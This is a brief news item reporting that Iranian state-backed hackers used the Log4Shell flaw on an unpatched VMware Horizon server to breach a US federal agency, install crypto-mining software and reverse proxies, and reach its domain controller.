Iranian Hackers Compromised a U.S. Federal Agency’s Network Using Log4Shell Exploit

Iranian-backed cyber threats infiltrated a US federal agency, exploiting the Log4Shell vulnerability on an unpatched VMware Horizon server. The hackers downloaded crypto mining software, accessed the domain controller and installed reverse proxies on several hosts. The attack marked ongoing use of Log4j vulnerabilities by Iranian state-linked groups. Previous advisories have pointed to Iran’s Islamic Revolutionary Guard Corps for such attacks. The affected agency is thought to be breached since February 2022 by using the glitch to avoid antivirus scans.